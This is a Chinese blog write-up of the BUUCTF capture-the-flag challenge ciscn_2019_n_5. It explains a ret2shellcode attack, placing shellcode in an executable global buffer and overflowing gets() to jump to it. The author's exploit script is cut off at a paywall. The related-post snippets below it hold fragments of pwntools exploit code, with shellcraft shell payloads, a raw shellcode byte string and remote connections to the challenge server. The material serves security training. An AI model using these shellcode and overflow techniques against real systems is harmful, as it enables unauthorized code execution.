BUUCTF 刷题 ciscn_2019_n_5

最新推荐文章于 2025-02-20 15:16:49 发布
原创 最新推荐文章于 2025-02-20 15:16:49 发布 · 3.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #经验分享

本文探讨了一种针对64位程序的安全漏洞利用技术,即RET2Shellcode攻击。通过分析程序的内存布局,发现存在RWX段,可以写入并执行shellcode。实验中使用IDA进行反汇编,找到关键函数调用,然后构造payload,通过栈溢出将控制流导向name段的shellcode,从而实现远程代码执行。最终,通过python的pwn库发送payload,成功交互并获得shell。

先附上题目:BUUCTF在线评测

放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

接下来放到IDA里f5一下,可以看到主函数读了一个0x64大小的name,又gets一个text

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char text[30]; // [rsp+0h] [rbp-20h]

  setvbuf(stdout, 0LL, 2, 0LL);
  puts("tell me your name");
  read(0, name, 0x64uLL);
  puts("wow~ nice name!");
  puts("What do you want to say to me?");
  gets(text, name);
  return 0;

 基本思路可知ret2shellcode,shellcode我们需要自己构造,vmmap发现name所在的段可读可写可执行,那么我们就可以在name处写上我们的shellcode,再用gets栈溢出来跳转到name的地址实现攻击。

exp:

from pwn import *

context(os = 'linux
最低0.47元/天 解锁文章
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 928
[BUUCTF-pwn]——ciscn_2019_n_5 目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1970
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 443
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 1175
[buuctf]ciscn_2019_n_5
buuctf ciscn_2019_n_5 (ret2shellcode)
carol2358的博客
04-21 1115
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
buuctfciscn_2019_c_1
weixin_54452942的博客
04-18 1041
通俗易懂
BUUCTF ciscn_2019_en_21
Helloity的博客
02-07 748
ctf
BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 708
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 2019
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
buuctf_ciscn_2019_n_5
2301_81060697的博客
02-20 445
buuctf
BUUCTF pwn——ciscn_2019_n_5
CNS-Enterprise BCC-1701-J
04-07 379
BUUCTF练习
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 2790
ciscn_2019_ne_5 目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
buuctf|pwn-ciscn_2019_n_5-wp
l2645470582_的博客
11-09 366
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,没有看到‘/bin/sh’可以拿到权限类的字符串 3.我们进入main函数看看 我们可以看出gets(text,name)这里造成溢出 我们再去看看name,然后发现name是bss段上的全局变量 又因为该没有system("/bin/sh")的字样,所以我们可以向bss段写入shellcode拿到权限 shellcode = asm(shellcraft.sh()...
ciscn_2019_ne_5BUUCTF
qq_41696518的博客
08-31 718
ciscn_2019_ne_5 BUUCTF
BUU-ciscn_2019_n_5
qq_45771413的博客
04-27 870
查看保护 什么都没保护.jpg IDA 逻辑很简单,两次输入。这两次输入看起来都可以利用: read限制了读取长度,而且name是全局变量,地址可访问。 gets里的text可以进行栈溢出,0x20 解思路 EXP from pwn import * p=remote('node3.buuoj.cn',29048) context.arch = 'amd64' # 架构名称,不加狂报错…… context.log_level = 'debug' # debug模式 shellcode = asm(s
ciscn_2019_n_5
qq_39869547的博客
01-11 1119
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
【CTF】ciscn_2019_n_5
凉水的博客
04-22 1157
目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
buuctf ciscn_2019_n_5 ret2shellcode解思路
weixin_45441024的博客
12-02 579
BUUCTF ciscn_2019_n_5 ret2shellcode check一下,最喜欢的一片红色,64位的程序 发现存在两次输入,那么我们就通过read将构造的shellcode写在栈上,然后在第二次的时候通过构造溢出覆盖返回地址跳转到我们写入shellcode的这个地方,然后就开始构造吧: from pwn import * p=remote('node3.buuoj.cn',25157) sh="\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31
buuctf pwn others_shellcode
最新发布
02-25
### BUUCTF Pwn Others_shellcode 解思路 #### 目概述 此目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello Sally

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值